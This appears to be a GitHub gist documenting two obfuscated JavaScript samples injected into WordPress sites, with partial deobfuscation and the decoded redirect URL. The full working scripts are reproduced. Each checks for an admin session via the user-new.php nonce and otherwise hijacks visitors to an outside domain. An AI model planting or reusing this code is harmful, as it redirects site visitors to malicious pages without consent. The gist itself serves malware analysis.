Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
wp-admin/user-new.php malware
Malicious JS
var _0x23e9=['fromCharCode','href','protocol','_wpnonce_create-user','hostname','2393Pryhqw','open','/wp-admin/user-new.php','responseText','409897xshIay','location','169513QzOUxL','50FowjZA','wp-login','9859XsvnsI','781107ACONqL','971499IySred','replace','137OAkHgN','19aiEBJJ','send','indexOf','stop','146NrndrR','8530CekIlp','match'];var _0x12b5=function(_0x4550ff,_0x13cb05){_0x4550ff=_0x4550ff-0x75;var _0x23e9f6=_0x23e9[_0x4550ff];return _0x23e9f6;};var _0x47a6be=_0x12b5;(function(_0x40233a,_0x370641){var _0x58b599=_0x12b5;while(!![]){try{var _0x59ca3d=-parseInt(_0x58b599(0x7e))*parseInt(_0x58b599(0x76))+-parseInt(_0x58b599(0x87))*parseInt(_0x58b599(0x85))+parseInt(_0x58b599(0x88))+-parseInt(_0x58b599(0x82))+-parseInt(_0x58b599(0x89))+parseInt(_0x58b599(0x77))*-parseInt(_0x58b599(0x8b))+-parseInt(_0x58b599(0x8c))*-parseInt(_0x58b599(0x84));if(_0x59ca3d===_0x370641)break;else _0x40233a['push'](_0x40233a['shift']());}catch(_0x2b4363){_0x40233a['push'](_0x40233a['shift']());}}}(_0x23e9,0x94cf0));function checkme(){var _0xf7249d=_0x12b5,_0xcdc926=window[_0xf7249d(0x83)][_0xf7249d(0x7b)]+'//'+window[_0xf7249d(0x83)][_0xf7249d(0x7d)],_0x4b9617=httpGet(_0xcdc926+_0xf7249d(0x80)),_0x1824e4=/name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;if(_0x4b9617[_0xf7249d(0x8e)](_0xf7249d(0x7c))!==-0x1){var _0x2bd2b5=_0x1824e4['exec'](_0x4b9617);if(_0x2bd2b5[0x2][_0xf7249d(0x78)](/([a-z0-9]{10})/))return 0x1;}return 0x0;}if(checkme()==0x0){if(window[_0x47a6be(0x83)]['href'][_0x47a6be(0x8e)](_0x47a6be(0x86))>-0x1){}else{window[_0x47a6be(0x75)]();var lp=String[_0x47a6be(0x79)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x47a6be(0x83)][_0x47a6be(0x8a)](lp),document['location'][_0x47a6be(0x7a)]=lp;}}else{}function httpGet(_0x45b588){var _0x14042e=_0x47a6be,_0x2d0603=new XMLHttpRequest();return _0x2d0603[_0x14042e(0x7f)]('GET',_0x45b588,![]),_0x2d0603[_0x14042e(0x8d)](null),_0x2d0603[_0x14042e(0x81)];}
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return _0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];}
1. Decoded _0x23e9
'use strict';
/** @type {!Array} */
var _0x23e9 = ["fromCharCode", "href", "protocol", "_wpnonce_create-user", "hostname", "2393Pryhqw", "open", "/wp-admin/user-new.php", "responseText", "409897xshIay", "location", "169513QzOUxL", "50FowjZA", "wp-login", "9859XsvnsI", "781107ACONqL", "971499IySred", "replace", "137OAkHgN", "19aiEBJJ", "send", "indexOf", "stop", "146NrndrR", "8530CekIlp", "match"];
/**
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
*/
var _0x12b5 = function(totalExpectedResults, entrySelector) {
/** @type {number} */
totalExpectedResults = totalExpectedResults - 117;
var _0x23e9f6 = _0x23e9[totalExpectedResults];
return _0x23e9f6;
};
/** @type {function(number, ?): ?} */
var _0x47a6be = _0x12b5;
(function(PL$107, y) {
/** @type {function(number, ?): ?} */
var toMonths = _0x12b5;
for (; !![];) {
try {
/** @type {number} */
var swipingDirection = -parseInt(toMonths(126)) * parseInt(toMonths(118)) + -parseInt(toMonths(135)) * parseInt(toMonths(133)) + parseInt(toMonths(136)) + -parseInt(toMonths(130)) + -parseInt(toMonths(137)) + parseInt(toMonths(119)) * -parseInt(toMonths(139)) + -parseInt(toMonths(140)) * -parseInt(toMonths(132));
if (swipingDirection === y) {
break;
} else {
PL$107["push"](PL$107["shift"]());
}
} catch (_0x2b4363) {
PL$107["push"](PL$107["shift"]());
}
}
})(_0x23e9, 609520);
/**
* @return {?}
*/
function checkme() {
/** @type {function(number, ?): ?} */
var d3_vendorSymbol = _0x12b5;
var _0xcdc926 = window[d3_vendorSymbol(131)][d3_vendorSymbol(123)] + "//" + window[d3_vendorSymbol(131)][d3_vendorSymbol(125)];
var n = httpGet(_0xcdc926 + d3_vendorSymbol(128));
/** @type {!RegExp} */
var dojo = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
if (n[d3_vendorSymbol(142)](d3_vendorSymbol(124)) !== -1) {
var diffVector = dojo["exec"](n);
if (diffVector[2][d3_vendorSymbol(120)](/([a-z0-9]{10})/)) {
return 1;
}
}
return 0;
}
if (checkme() == 0) {
if (window[_0x47a6be(131)]["href"][_0x47a6be(142)](_0x47a6be(134)) > -1) {
} else {
window[_0x47a6be(117)]();
var lp = String[_0x47a6be(121)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51);
window[_0x47a6be(131)][_0x47a6be(138)](lp);
document["location"][_0x47a6be(122)] = lp;
}
} else {
}
/**
* @param {?} url
* @return {?}
*/
function httpGet(url) {
var convertObjectWithTemplates = _0x47a6be;
/** @type {!XMLHttpRequest} */
var xhr = new XMLHttpRequest;
return xhr[convertObjectWithTemplates(127)]("GET", url, ![]), xhr[convertObjectWithTemplates(141)](null), xhr[convertObjectWithTemplates(129)];
}
;
2. Decode _0x2825
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return _0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];}
'use strict';
/** @type {!Array} */
var _0x2825 = ["3hDSBaH", "877436TcDUUT", "/wp-admin/user-new.php", "1533496ZfMzaT", "111413jVhcXt", "1iyZpOm", "href", "850953KfrjDB", "replace", "1328659gEXdcO", "location", "send", "open", "hostname", "1670551uThOzi", "_wpnonce_create-user", "responseText", "GET", "81125ZdnGmk", "indexOf", "stop", "fromCharCode"];
/**
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
*/
var _0x56b8 = function(totalExpectedResults, entrySelector) {
/** @type {number} */
totalExpectedResults = totalExpectedResults - 134;
var _0x2825ba = _0x2825[totalExpectedResults];
return _0x2825ba;
};
/** @type {function(number, ?): ?} */
var _0x3f0146 = _0x56b8;
(function(PL$107, y) {
/** @type {function(number, ?): ?} */
var toMonths = _0x56b8;
for (; !![];) {
try {
/** @type {number} */
var swipingDirection = parseInt(toMonths(138)) + -parseInt(toMonths(136)) + parseInt(toMonths(153)) + -parseInt(toMonths(139)) * parseInt(toMonths(135)) + parseInt(toMonths(142)) + -parseInt(toMonths(149)) * parseInt(toMonths(140)) + parseInt(toMonths(144));
if (swipingDirection === y) {
break;
} else {
PL$107["push"](PL$107["shift"]());
}
} catch (_0x5d00d9) {
PL$107["push"](PL$107["shift"]());
}
}
})(_0x2825, 912007);
/**
* @return {?}
*/
function checkme() {
/** @type {function(number, ?): ?} */
var d3_vendorSymbol = _0x56b8;
if (window[d3_vendorSymbol(145)][d3_vendorSymbol(141)][d3_vendorSymbol(154)]("wp-login") !== -1) {
return 1;
}
var _0x51714c = window[d3_vendorSymbol(145)]["protocol"] + "//" + window[d3_vendorSymbol(145)][d3_vendorSymbol(148)];
var n = httpGet(_0x51714c + d3_vendorSymbol(137));
if (n[d3_vendorSymbol(154)](d3_vendorSymbol(150)) !== -1) {
return 1;
}
return 0;
}
if (checkme() == 0) {
window[_0x3f0146(155)]();
var lp = String[_0x3f0146(134)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51);
window[_0x3f0146(145)][_0x3f0146(143)](lp);
document[_0x3f0146(145)][_0x3f0146(141)] = lp;
} else {
}
/**
* @param {?} url
* @return {?}
*/
function httpGet(url) {
var now = _0x3f0146;
/** @type {!XMLHttpRequest} */
var rpm_traffic = new XMLHttpRequest;
return rpm_traffic[now(147)](now(152), url, ![]), rpm_traffic[now(146)](null), rpm_traffic[now(151)];
}
;
Malicious URLs encoded:
https://blow.talkingaboutfirms.ga/?sid=54745-33-674347-21&cid=378345&pidi=654368&aid=27833
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment